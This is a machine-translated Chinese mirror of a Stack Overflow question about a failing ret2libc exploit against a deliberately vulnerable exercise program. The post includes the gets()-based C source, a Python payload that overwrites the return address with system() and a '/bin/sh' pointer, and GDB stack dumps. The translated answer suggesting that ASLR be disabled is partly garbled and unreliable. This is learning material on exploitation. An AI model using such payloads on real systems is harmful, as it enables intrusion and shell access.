分割故障ret2libc攻击
分割故障ret2libc攻击
提问于 2018-06-13 15:38:10
我正在尝试执行ret2libc攻击。为此,我需要从libc调用System()并传递参数"/bin/sh“(地址/bin/sh)。不幸的是,我每次都会得到“分割错误”。
谁能告诉我原因吗?如果我在看堆栈,一切看起来都很好(对我来说)。
这是我的源代码:
void getpath()
{
char buffer[64];
unsigned int ret;
printf("input path please: "); fflush(stdout);
gets(buffer);
ret = __builtin_return_address(0);
if((ret & 0xbf000000) == 0xbf000000) {
printf("bzzzt (%p)\n", ret);
_exit(1);
}
printf("got path %s\n", buffer);
}
int main(int argc, char **argv)
{
getpath();
}我的漏洞代码如下:
import struct
offset = "A"*88
system_adress = struct.pack("q",0x7ffff7a60510)
nop = "\x90"*4
bin_sh_adress = struct.pack("q",0x7ffff7b9b3f3)
#libc_start = 0x7ffff7a1e000
#sh_offset = 0x17d3f3
#libc_start plus sh_Offset = 0x7ffff7b9b3f3
print(offset + system_adress + nop + bin_sh_adress)
In the following my terminal commands:
>>> r < ./text
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/Desktop/ExerciseExploit/stack6 < ./text
Breakpoint 2, getpath () at stack6.c:11
11 printf("input path please: "); fflush(stdout);
>>> i r rsp rbp
rsp 0x7fffffffe160 0x7fffffffe160
rbp 0x7fffffffe1b0 0x7fffffffe1b0
>>> x/40xw $rsp
0x7fffffffe160: 0x00000000 0x00000000 0x00f0b2ff 0x00000000
0x7fffffffe170: 0x000000c2 0x00000000 0xffffe1a6 0x00007fff
0x7fffffffe180: 0x00000001 0x00000000 0xf7abe905 0x00007fff
0x7fffffffe190: 0x00000001 0x00000000 0x5555485d 0x00005555
0x7fffffffe1a0: 0xf7de70e0 0x00007fff 0x00000000 0x00000000
0x7fffffffe1b0: 0xffffe1d0 0x00007fff 0x555547fd 0x00005555
0x7fffffffe1c0: 0xffffe2b8 0x00007fff 0x00000000 0x00000001
0x7fffffffe1d0: 0x55554810 0x00005555 0xf7a3fa87 0x00007fff
0x7fffffffe1e0: 0x00000000 0x00000000 0xffffe2b8 0x00007fff
0x7fffffffe1f0: 0x00040000 0x00000001 0x555547e4 0x00005555
>>> n
input path please: 13 gets(buffer);
>>> n
Breakpoint 1, getpath () at stack6.c:15
15 ret = __builtin_return_address(0);
>>> i r rsp rbp
rsp 0x7fffffffe160 0x7fffffffe160
rbp 0x7fffffffe1b0 0x7fffffffe1b0
>>> x/40xw $rsp
0x7fffffffe160: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe170: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe180: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe190: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe1a0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe1b0: 0x41414141 0x41414141 0xf7a60510 0x00007fff
0x7fffffffe1c0: 0x90909090 0xf7b9b3f3 0x00007fff 0x00000000
0x7fffffffe1d0: 0x55554810 0x00005555 0xf7a3fa87 0x00007fff
0x7fffffffe1e0: 0x00000000 0x00000000 0xffffe2b8 0x00007fff
0x7fffffffe1f0: 0x00040000 0x00000001 0x555547e4 0x00005555
>>> n
17 if((ret & 0xbf000000) == 0xbf000000) {
>>> n
22 printf("got path %s\n", buffer);
>>> 错误报告:
root@kali:~/Desktop/ExerciseExploit# python exploit6.py | ./stack6
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��AAAAAAAA���
Segmentation fault回答 1
Stack Overflow用户
回答已采纳
发布于 2018-06-28 20:16:41
关着的不营业的
解决问题:
->禁用0>/proc/sys//->_va_space
页面原文内容由Stack Overflow提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:
https://stackoverflow.com/questions/50841188
复制相关文章
相似问题
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号